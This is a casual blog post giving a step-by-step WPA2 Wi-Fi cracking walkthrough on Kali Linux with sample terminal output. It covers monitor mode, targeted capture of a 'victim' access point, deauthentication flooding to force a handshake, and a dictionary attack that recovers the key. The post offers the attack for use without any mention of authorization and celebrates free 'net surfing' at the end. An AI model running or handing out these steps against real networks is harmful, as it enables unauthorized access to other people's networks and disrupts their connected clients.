d3adR1nger
1 supporter
WPA2 cracking on Kali Linux with Diction ...

WPA2 cracking on Kali Linux with Dictionary attack Gist

Dec 04, 2020

Crack WPA2 with Kali Linux Dictionary Attack

Whazuuuuuup

Wazzzaaaap WiFi hackers! Here is the command Gist of the Crack WPA2 with Kali Linux writeup I wrote on the Hacker Realm on Sudorealm.com

Setup

Connect your Wireless Card dude, don't forget that!
Check if it is connected: ifconfig wlan0or iwconfig wlan0

Put the Card on Monitor Mode

root@kali:~# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  448 NetworkManager
  525 dhclient
  654 wpa_supplicant

PHY	Interface	Driver		Chipset

phy0	wlan0		ath9k_htc	Atheros Communications, Inc. TP-Link TL-WN322G v3 / TL-WN422G v2 802.11g [Atheros AR9271]

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

And check if you are on monitor mode with iwconfig wlan0mon😉

Sniffing the air for targets

airodump-ng wlan0mon

Wait until your target pops up on the list and press ctrl+c to stop the monitoring.

Start targeted monitoring of your victim AP

airodump-ng --bssid 50:C7:BF:DC:4C:E8 -c 11 wlan0mon -w sudorealm

⚠ Do not Ctrl+C, you want that running until you catch a handshake.
Your target's bssid and the channel will be displayed on the generic monitoring you did before.
-w sudorealm will store the results of the monitoring in different files. You want a file named sudorealm_01.cap which has the handshake stored in it.

Deauthenticate victim to force a handshake Capture

➕ On a new terminal window.

aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 wlan0mon 

13:43:26  Waiting for beacon frame (BSSID: 50:C7:BF:DC:4C:E8) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
13:43:26  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:26  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:27  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:27  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:28  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]

You can change the -0 0 to -0 20 to Force the victim to disconnect and connect again.

Now wait until the other terminal shows this:

CH 11 ][ Elapsed: 7 mins ][ 2019-02-22 13:43 ][ WPA handshake: 50:C7:BF:DC:4C:E8  

WPA handshake of the victim AP. You are Set. 💪

Dictionary Attack to crack the Handshake

aircrack-ng sudorealm-01.cap -w Desktop/sudorealm.txt

Supposing you have some dictionaries somewhere in your system.
If you don't, here is a good start:

git clone https://github.com/danielmiessler/SecLists.git

Google that a bit and you'll thank me later.

00:00:00] 4/20 keys tested (316.73 k/s) 

      Time left: 0 seconds                                      20.00%

                         KEY FOUND! [ sudorealmRulez ]


      Master Key     : C3 3E A1 D6 E5 9E 58 66 B2 20 3E AC 27 90 44 E2 
                       06 17 91 76 B7 98 A7 3C 9D 61 67 32 99 95 72 0E 

      Transient Key  : EF 0B 80 7E 59 5A F4 15 51 4C 48 F8 62 7F 81 E7 
                       D8 E7 3F E3 0A D4 2C 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : D5 D4 EB 86 16 33 4F FC 2C 74 3C E6 DB AF 81 70 

The Password is Cracked, we are happy, and it's time for net surfing! 🏄‍♀️

Bam Boom hacked! 👩‍💻 Leave your comments below or find me @

🤖 https://www.reddit.com/user/stantz16 | The front page of the internet.

🐥https://twitter.com/DevThanos | The one that got hacked good.

🤵 https://www.linkedin.com/in/athanasios-stantzouris-34ba44141/ | Facebook but not facebook.

Thanks Yall 🎉🎈🥳

Zero Cool, Mess with the best, Die like the rest

Enjoy this post?

Buy d3adR1nger a coffee

More from d3adR1nger